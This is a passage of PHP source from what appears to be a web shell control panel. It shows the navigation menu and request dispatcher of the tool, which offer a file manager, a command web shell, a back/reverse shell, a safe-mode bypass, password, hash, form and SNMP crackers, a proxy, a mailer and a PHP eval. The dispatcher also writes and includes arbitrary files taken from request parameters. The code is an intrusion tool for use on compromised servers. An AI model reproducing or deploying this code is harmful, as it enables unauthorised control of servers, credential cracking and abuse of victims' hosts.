<tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=sqlcl&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=ftpc&workingdiR=$cwd"); ?>">[FTP]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mail]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=tools&workingdiR=$cwd");?>">[Tools]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href='".hlinK("seC=logout")."'>Logout</a>]";?></td></tr></table>
|
||
|
<hr size=1 noshade>
|
||
|
<?php
|
||
|
if(!empty($_REQUEST['seC'])){
|
||
|
switch($_REQUEST['seC']){
|
||
|
case 'fm':filemanageR();break;
|
||
|
case 'sc':scanneR();break;
|
||
|
case 'phpinfo':phpinfo();break;
|
||
|
case 'edit':if(!empty($_REQUEST['open']))editoR($_REQUEST['filE']);
|
||
|
if(!empty($_REQUEST['Save'])){
|
||
|
$filehandle=fopen($_REQUEST['file'],'w');
|
||
|
fwrite($filehandle,$_REQUEST['edited']);
|
||
|
fclose($filehandle);}
|
||
|
if(!empty($_REQUEST['filE']))editoR($_REQUEST['filE']);else editoR('');
|
||
|
break;
|
||
|
case 'openit':openiT($_REQUEST['namE']);break;
|
||
|
case 'cr':crackeR();break;
|
||
|
case 'dic':dicmakeR();break;
|
||
|
case 'tools':toolS();break;
|
||
|
case 'hex':hexvieW();break;
|
||
|
case 'img':showimagE($_REQUEST['filE']);break;
|
||
|
case 'inc':if(file_exists($_REQUEST['filE']))include($_REQUEST['filE']);break;
|
||
|
case 'hc':hashcrackeR();break;
|
||
|
case 'fcr':formcrackeR();break;
|
||
|
case 'auth':authcrackeR();break;
|
||
|
case 'ftpc':ftpclienT();break;
|
||
|
case 'eval':phpevaL();break;
|
||
|
case 'snmp':snmpcrackeR();break;
|
||
|
case 'px':pr0xy();break;
|
||
|
case 'webshell':webshelL();break;
|
||
|
case 'mailer':maileR();break;
|
||
|
case 'br':brshelL();break;
|
||
|
case 'asm':safemodE();break;
|
||
|
case 'sqlcl':sqlclienT();break;
|
||
|
case 'calc':calC();break;
|
||
|
case 'sysinfo':sysinfO();break;
|
||
|
case 'checksum':checksuM($_REQUEST['filE']);break;
|
||
|
case 'logout':logouT();break;
|
||
|
default: echo $intro;}}else echo $intro;
|
||
|
echo $footer;?></body></html>
|